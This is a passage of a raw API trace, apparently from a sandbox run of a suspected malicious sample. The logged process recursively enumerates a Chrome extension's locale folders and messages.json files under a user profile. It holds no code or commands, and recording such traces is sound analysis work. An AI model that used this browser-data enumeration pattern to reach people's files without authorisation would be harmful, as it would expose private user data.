ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x5f, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="main.js", cAlternateFileName="")) returned 1 [0137.602] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x4497e0 [0137.602] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xbf) returned 0x9138d58 [0137.602] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4497e0 | out: hHeap=0x3f0000) returned 1 [0137.602] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9138c90 | out: hHeap=0x3f0000) returned 1 [0137.602] FindNextFileA (in: hFindFile=0x9148b38, lpFindFileData=0x36dce8 | out: lpFindFileData=0x36dce8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2d5, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0137.602] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x4497e0 [0137.602] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xbf) returned 0x9138c90 [0137.602] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4497e0 | out: hHeap=0x3f0000) returned 1 [0137.602] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9138d58 | out: hHeap=0x3f0000) returned 1 [0137.602] FindNextFileA (in: hFindFile=0x9148b38, lpFindFileData=0x36dce8 | out: lpFindFileData=0x36dce8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="_locales", cAlternateFileName="")) returned 1 [0137.602] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x4497e0 [0137.602] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xbf) returned 0x9138d58 [0137.602] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4497e0 | out: hHeap=0x3f0000) returned 1 [0137.602] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0137.602] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*", lpFindFileData=0x36dab0 | out: lpFindFileData=0x36dab0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3, cFileName=".", cAlternateFileName="")) returned 0x9148b78 [0137.605] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0137.605] FindNextFileA (in: hFindFile=0x9148b78, lpFindFileData=0x36dab0 | out: lpFindFileData=0x36dab0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3, cFileName="..", cAlternateFileName="")) returned 1 [0137.605] FindNextFileA (in: hFindFile=0x9148b78, lpFindFileData=0x36dab0 | out: lpFindFileData=0x36dab0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3, cFileName="ar", cAlternateFileName="")) returned 1 [0137.605] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0137.606] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x4641a8 [0137.606] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9144638 [0137.606] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4641a8 | out: hHeap=0x3f0000) returned 1 [0137.606] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857953d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0137.606] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0137.606] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x4641a8 [0137.606] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd7) returned 0x90d1020 [0137.606] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4641a8 | out: hHeap=0x3f0000) returned 1 [0137.606] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857953d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x101, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0137.606] FindClose (in: hFindFile=0x9144638 | out: hFindFile=0x9144638) returned 1 [0137.607] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0137.607] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0137.607] FindNextFileA (in: hFindFile=0x9148b78, lpFindFileData=0x36dab0 | out: lpFindFileData=0x36dab0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9144638, dwReserved1=0x13d180a, cFileName="bg", cAlternateFileName="")) returned 1 [0137.607] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0137.607] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x4641a8 [0137.607] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\*", lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9144638 [0137.607] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4641a8 | out: hHeap=0x3f0000) returned 1 [0137.607] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0137.607] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0137.607] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x4641a8 [0137.607] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd7) returned 0x90d1020 [0137.607] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4641a8 | out: hHeap=0x3f0000) returned 1 [0137.607] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x110, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0137.607] FindClose (in: hFindFile=0x9144638 | out: hFindFile=0x9144638) returned 1 [0137.608] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0137.608] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0137.608] FindNextFileA (in: hFindFile=0x9148b78, lpFindFileData=0x36dab0 | out: lpFindFileData=0x36dab0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9144638, dwReserved1=0x13d180a, cFileName="ca", cAlternateFileName="")) returned 1 [0137.608] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0137.608] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x4641a8 [0137.608] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9144638 [0137.612] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4641a8 | out: hHeap=0x3f0000) returned 1 [0137.612] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0137.612] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0137.612] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x4641a8 [0137.612] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd7) returned 0x90d1020 [0137.612] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4641a8 | out: hHeap=0x3f0000) returned 1 [0137.612] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0137.612] FindClose (in: hFindFile=0x9144638 | out: hFindFile=0x9144638) returned 1 [0137.612] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0137.612] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0137.612] FindNextFileA (in: hFindFile=0x9148b78, lpFindFileData=0x36dab0 | out: lpFindFileData=0x36dab0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9144638, dwReserved1=0x13d180a, cFileName="cs", cAlternateFileName="")) returned 1 [0137.612] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0137.613] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x4641a8 [0137.613] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\cs\\*", lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9144638 [0137.614] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4641a8 | out: hHeap=0x3f0000) returned 1 [0137.614] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0137.614] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0137.614] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x4641a8 [0137.614] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd7) returned 0x90d1020 [0137.614] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4641a8 | out: hHeap=0x3f0000) returned 1 [0137.614] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0137.614] FindClose (in: hFindFile=0x9144638 | out: hFindFile=0x9144638) returned 1 [0137.614] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0137.614] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0137.614] FindNextFileA (in: hFindFile=0x9148b78, lpFindFileData=0x36dab0 | out: lpFindFileData=0x36dab0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9144638, dwReserved1=0x13d180a, cFileName="da", cAlternateFileName="")) returned 1 [0137.614] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x90) returned 0x499b90 [0137.614] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*", lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9144638 [0137.696] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4641a8 | out: hHeap=0x3f0000) returned 1 [0137.696] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0137.696] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0137.697] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0137.697] FindClose (in: hFindFile=0x9144638 | out: hFindFile=0x9144638) returned 1 [0137.697] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d1020 | out: hHeap=0x3f0000) returned 1 [0137.697] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x499b90 | out: hHeap=0x3f0000) returned 1 [0137.697] FindNextFileA (in: hFindFile=0x9148b78, lpFindFileData=0x36dab0 | out: lpFindFileData=0x36dab0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9144638, dwReserved1=0x13d180a, cFileName="de", cAlternateFileName="")) returned 1 [0137.697] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*", lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName=".", cAlternateFileName="")) returned 0x9144638 [0137.698] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4641a8 | out: hHeap=0x3f0000) returned 1 [0137.698] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="..", cAlternateFileName="")) returned 1 [0137.698] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x3f0000, dwReserved1=0x77c6e36c, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0137.698] FindNextFileA (in: hFindFile=0x9144638, lpFindFileData=0x36d878 | out: lpFindFileData=0x36d878*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, 